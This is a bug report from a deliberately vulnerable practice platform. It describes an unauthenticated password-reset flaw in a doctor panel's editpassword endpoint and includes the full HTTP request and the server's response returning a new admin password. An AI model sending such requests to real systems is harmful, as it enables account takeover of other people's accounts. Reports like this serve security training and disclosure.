FirstBlood-#383 — Edit password functionality can be used to reset password of any user
This issue was discovered on FirstBlood v2.0.0 (issues patched)
On 2021-10-25, sumyth Level 2 reported:
Please find a brief description of the vulnerability below,
In firstblood.com there exists a functionality which can be used to reset the password of any user/doctor present on the website without even being authenticated.
Steps to reproduce:
- Generate the following post request with username of your choice,
POST /drpanel/drapi/editpassword.php HTTP/1.1 Host: 15c5a8ff7386-sumyth.a.firstbloodhackers.com Sec-Ch-Ua: ";Not A Brand";v="99", "Chromium";v="94" Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Sec-Ch-Ua-Platform: "Windows" Accept: */* Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://15c5a8ff7386-sumyth.a.firstbloodhackers.com/drpanel/index.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 16 username=drAdmin
- Send the request to server. Observe that the server responds with a new set of password for the user even without performing proper authorization checks,
HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Oct 2021 15:58:32 GMT Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 34 Password updated - bL9TfVhgA5Oxs46
Having a password changing functionality without any kind of authorization can lead to an attacker reset the password for any user on the website which will lead to account compromise.
/drpanel/drapi/editpassword.php This bug makes use of the following vulnerabilities in a chain:
FirstBlood ID: 28
Vulnerability Type: Auth issues
The endpoint /drapi/editpassword can actually be accessed unauthenticated.
FirstBlood ID: 27
Vulnerability Type: Application/Business Logic
It is possible to edit the admins password (dradmin) from /drapi/editpassword as it's only looking for the username. Usernames can be enumerated when logging in as trying 'drAdmin' results in a different error. The username can also be found from FirstBlood v1.